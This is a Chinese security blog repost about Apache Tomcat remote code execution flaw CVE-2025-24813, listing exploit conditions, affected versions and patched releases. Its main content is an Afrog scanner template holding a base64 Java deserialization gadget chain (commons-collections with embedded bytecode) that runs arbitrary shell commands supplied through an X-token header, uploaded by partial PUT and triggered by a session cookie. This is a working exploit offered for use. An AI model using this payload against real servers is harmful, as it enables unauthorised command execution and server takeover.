Tomcat远程代码执行漏洞CVE-2025-24813(附POC)

2025年3月24日19:48:39评论49 views字数 14516阅读48分23秒阅读模式

简单介绍

Apache Tomcat 组件存在远程代码执行漏洞(CVE-2025-24813)，当应用程序DefaultServlet启用写入功能（默认情况下禁用）、使用 Tomcat默认会话持久机制和存储位置、依赖库存在反序列化利用链时，未授权攻击者能够执行恶意代码获取服务器权限。

利用条件

成功利用漏洞需要满足以下条件

● 应用程序启用了DefaultServlet写入功能（默认关闭）。

● 应用支持partial PUT请求（默认开启）。

● 应用使用了Tomcat的文件会话持久化且使用了默认的会话存储位置。

● 应用中包含存在反序列化漏洞的库，如commons-collections等。

漏洞影响范围
11.0.0-M1 <= Apache Tomcat <= 11.0.2
10.1.0-M1 <= Apache Tomcat <= 10.1.34
9.0.0.M1 <= Apache Tomcat <= 9.0.98

验证POC

Afrog验证POC：

id: CVE-2025-24813info:  name: Apache Tomcat远程代码执行漏洞CVE-2025-24813  author: qingchen  severity: high  verified: true  description: |    Apache Tomcat远程代码执行漏洞CVE-2025-24813    fofa：app="APACHE-Tomcat"  tags: rce  created: 2025/03/14set:  randint: randomInt(1000000, 9999999)  randstr: randomLowercase(32)  bodystr: base64Decode("rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzdAASW0xqYXZhL2xhbmcvQ2xhc3M7TAAFX25hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAIoLK/rq+AAAAMgGgAQBNb3JnL2FwYWNoZS9iZWFudXRpbHMvY295b3RlL3V0aWwvSVNPODYwMVV0aWxzZmE1NzYxN2FhNmVkNDZkNGIyNzc1YWZlNjg4NTU0N2EHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAGaGVhZGVyAQASTGphdmEvbGFuZy9TdHJpbmc7AQAFZGVidWcBAAFaAQAEb25jZQEABjxpbml0PgEAAygpVgwACgALCgAEAAwBAANydW4BAAdpc0pldHR5AQADKClaDAAPABAKAAIAEQEAB2RvSmV0dHkMABMACwoAAgAUDAAJAAgJAAIAFgEACmlzV2VibG9naWMMABgAEAoAAgAZAQAKZG9XZWJsb2dpYwwAGwALCgACABwBAAhpc1RvbWNhdAwAHgAQCgACAB8BAAhkb1RvbWNhdAwAIQALCgACACIBAAhpc1NwcmluZwwAJAAQCgACACUBAAhkb1NwcmluZwwAJwALCgACACgBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAqAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5yZXF1ZXN0LlJlcXVlc3RBdHRyaWJ1dGVzCAAsAQAPamF2YS9sYW5nL0NsYXNzBwAuAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMADAAMQoALwAyDAAHAAgJAAIANAEAEGphdmEvbGFuZy9TeXN0ZW0HADYBAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsMADgAOQkANwA6AQAqW29uZS1mb3ItYWxsLWVjaG9dIFtpbml0XSB0YXJnZXQgaXMgc3ByaW5nCAA8AQATamF2YS9pby9QcmludFN0cmVhbQcAPgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAEAAQQoAPwBCAQAsd2VibG9naWMuc2VydmxldC5pbnRlcm5hbC5TZXJ2bGV0UmVxdWVzdEltcGwIAEQBACxbb25lLWZvci1hbGwtZWNob10gW2luaXRdIHRhcmdldCBpcyB3ZWJsb2dpYwgARgEAJW9yZy5hcGFjaGUuY2F0YWxpbmEuc3RhcnR1cC5Cb290c3RyYXAIAEgBACpbb25lLWZvci1hbGwtZWNob10gW2luaXRdIHRhcmdldCBpcyB0b21jYXQIAEoBAC9vcmcuZWNsaXBzZS5qZXR0eS5zZXJ2bGV0LlNlcnZsZXRDb250ZXh0SGFuZGxlcggATAEAKVtvbmUtZm9yLWFsbC1lY2hvXSBbaW5pdF0gdGFyZ2V0IGlzIGpldHR5CABOAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uBwBQAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcAUgEAEGphdmEvbGFuZy9UaHJlYWQHAFQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsMAFYAVwoAVQBYAQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7DABaAFsKAFUAXAEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsMAF4AXwoAVQBgAQAQamF2YS9sYW5nL09iamVjdAcAYgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAZABlCgBjAGYBAAd0aHJlYWRzCABoAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAagBrCgAvAGwBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAbgEADXNldEFjY2Vzc2libGUBAAQoWilWDABwAHEKAG8AcgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAB0AHUKAG8AdgEAE1tMamF2YS9sYW5nL1RocmVhZDsHAHgBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsMAHoAewoAVQB8AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIHAH4KAH8ADAEAK1tvbmUtZm9yLWFsbC1lY2hvXSBbdG9tY2F0XSB0aHJlYWQgbmFtZSAtPiAIAIEBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsMAIMAhAoAfwCFAQAIdG9TdHJpbmcMAIcAewoAfwCIAQAEZXhlYwgAigEAEGphdmEvbGFuZy9TdHJpbmcHAIwBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAjgCPCgCNAJABAARodHRwCACSAQAGdGFyZ2V0CACUAQASamF2YS9sYW5nL1J1bm5hYmxlBwCWAQAGdGhpcyQwCACYAQAHaGFuZGxlcggAmgEADWdldFN1cGVyY2xhc3MMAJwAZQoALwCdAQAGZ2xvYmFsCACfAQAKcHJvY2Vzc29ycwgAoQEADmphdmEvdXRpbC9MaXN0BwCjAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7DAClAKYLAKQApwEAEmphdmEvdXRpbC9JdGVyYXRvcgcAqQEAB2hhc05leHQMAKsAEAsAqgCsAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DACuAK8LAKoAsAEAA3JlcQgAsgEAC2dldFJlc3BvbnNlCAC0AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwAtgC3CgAvALgBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHALoBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMALwAvQoAuwC+AQAJZ2V0SGVhZGVyCADADAAFAAYJAAIAwgEAB2lzRW1wdHkMAMQAEAoAjQDFAQAJc2V0U3RhdHVzCADHAQARamF2YS9sYW5nL0ludGVnZXIHAMkBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsMAMsAzAkAygDNAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMAM8A0AoAygDRAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAIoA0woAAgDUAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCADWAQA9KExqYXZhL2xhbmcvU3RyaW5nO1pMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylMamF2YS9sYW5nL0NsYXNzOwwAMADYCgAvANkBAAtuZXdJbnN0YW5jZQwA2wCvCgAvANwBAAhzZXRCeXRlcwgA3gEAAltCBwDgAQARZ2V0RGVjbGFyZWRNZXRob2QMAOIAtwoALwDjAQAIZ2V0Qnl0ZXMBAAQoKVtCDADlAOYKAI0A5wEAB2RvV3JpdGUIAOkBABNqYXZhLm5pby5CeXRlQnVmZmVyCADrAQAEd3JhcAgA7QEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAcA7wEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcA8QEADmdldEN1cnJlbnRXb3JrCADzAQASZ2V0TWV0aG9kQW5kSW52b2tlAQBdKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzO1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAD1APYKAAIA9wEAK1tvbmUtZm9yLWFsbC1lY2hvXSBbd2VibG9naWNdIHVua25vd24gZXJyb3IIAPkKAC8AfAEAElNlcnZsZXRSZXF1ZXN0SW1wbAgA/AEACGVuZHNXaXRoAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaDAD+AP8KAI0BAAEAEWNvbm5lY3Rpb25IYW5kbGVyCAECAQANZ2V0RmllbGRWYWx1ZQEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DAEEAQUKAAIBBgEAEWdldFNlcnZsZXRSZXF1ZXN0CAEIAQAxW29uZS1mb3ItYWxsLWVjaG9dIFt3ZWJsb2dpY10gZWNobyBoZWFkZXIgaXMgbnVsbAgBCgoAYwCIAQAtW29uZS1mb3ItYWxsLWVjaG9dIFt3ZWJsb2dpY10gZWNobyByZXN1bHQgLT4gCAENAQAWZ2V0U2VydmxldE91dHB1dFN0cmVhbQgBDwEAI3dlYmxvZ2ljLnhtbC51dGlsLlN0cmluZ0lucHV0U3RyZWFtCAERAQALd3JpdGVTdHJlYW0IARMBABNqYXZhL2lvL0lucHV0U3RyZWFtBwEVAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwwBFwEYCgAvARkBAB1qYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcgcBGwEAJyhbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwA2wEdCgEcAR4BAAVmbHVzaAgBIAEACWdldFdyaXRlcggBIgEABXdyaXRlCAEkAQAACAEmAQAMdGhyZWFkTG9jYWxzCAEoAQAFdGFibGUIASoBABNbTGphdmEvbGFuZy9PYmplY3Q7BwEsAQAFdmFsdWUIAS4BABNBc3luY0h0dHBDb25uZWN0aW9uCAEwAQAKZ2V0UmVxdWVzdAgBMgEADmdldFByaW50V3JpdGVyCAE0AQAFdXRmLTgIATYBABNqYXZhL2lvL1ByaW50V3JpdGVyBwE4CgE5AEIBAA5IdHRwQ29ubmVjdGlvbggBOwEADmdldEh0dHBDaGFubmVsCAE9DAEgAAsKATkBPwEABWNsb3NlDAFBAAsKATkBQgEAPG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5SZXF1ZXN0Q29udGV4dEhvbGRlcggBRAEAFGdldFJlcXVlc3RBdHRyaWJ1dGVzCAFGAQBAb3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5yZXF1ZXN0LlNlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwgBSAwBJABBCgE5AUoBABBnZXRNZXRob2RCeUNsYXNzAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQBXKExqYXZhL2xhbmcvQ2xhc3M8Kj47TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M8Kj47KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7CgC7AHIBAGAoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M8Kj47W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAUwBTQoAAgFRAQASW0xqYXZhL2xhbmcvQ2xhc3M7BwFTAQAMcmVhZEFsbEJ5dGVzAQAZKExqYXZhL2lvL0lucHV0U3RyZWFtOylbQgEAE2phdmEvaW8vSU9FeGNlcHRpb24HAVcBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQcBWQoBWgAMAQAEcmVhZAEAByhbQklJKUkMAVwBXQoBFgFeAQAHKFtCSUkpVgwBJAFgCgFaAWEKAVoBPwEAC3RvQnl0ZUFycmF5DAFkAOYKAVoBZQEAB29zLm5hbWUIAWcBAAtnZXRQcm9wZXJ0eQwBaQDTCgA3AWoBAAt0b0xvd2VyQ2FzZQwBbAB7CgCNAW0BAAN3aW4IAW8BAAJzaAgBcQEAAi1jCAFzAQAHY21kLmV4ZQgBdQEAAi9jCAF3AQARamF2YS9sYW5nL1J1bnRpbWUHAXkBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAF7AXwKAXoBfQEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZh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")rules:  r0:    request:      method: PUT      path: /{{randint}}/session      headers:        Content-Range: bytes 0-1000/1200      body: "{{bodystr}}"    expression: response.status == 409  r1:    request:      method: GET      path: /      headers:        Cookie: JSESSIONID=.{{randint}}        X-token: echo {{randstr}}    expression: response.status == 200 && response.body.bcontains(bytes(randstr))expression: r0() && r1()

可以正常扫到漏洞。

本文POC主要来自清晨师傅的文章：

原文链接：https://mp.weixin.qq.com/s/j4_jUSDa1v98xTKSK5GH4Q

修复建议

目前，Apache官方已发布修复该漏洞的新版本，建议用户尽快升级至以下版本：

● Apache Tomcat >= 11.0.3

● Apache Tomcat >= 10.1.35

● Apache Tomcat >= 9.0.99

官方补丁下载地址：

● https://tomcat.apache.org/security-11.html

● https://tomcat.apache.org/security-10.html

● https://tomcat.apache.org/security-9.html

原文始发于微信公众号（小白爱学习Sec）：Tomcat远程代码执行漏洞CVE-2025-24813(附POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Tomcat远程代码执行漏洞CVE-2025-24813(附POC)

漏洞复现 || XWiki Platform系统远程代码执行 POC

用友NC files 反序列化RCE

【高危漏洞预警】Elastic Kibana需授权代码注入漏洞 (CVE-2025-25014)

CVE-2025-2905（CVSS 9.1）：WSO2 API 管理器中发现严重 XXE 漏洞

【风险通告】Elastic Kibana存在原型污染致任意代码执行漏洞（CVE-2025-25014）

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

CVE-2025-24071：通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014)

发表评论

在线咨询

微信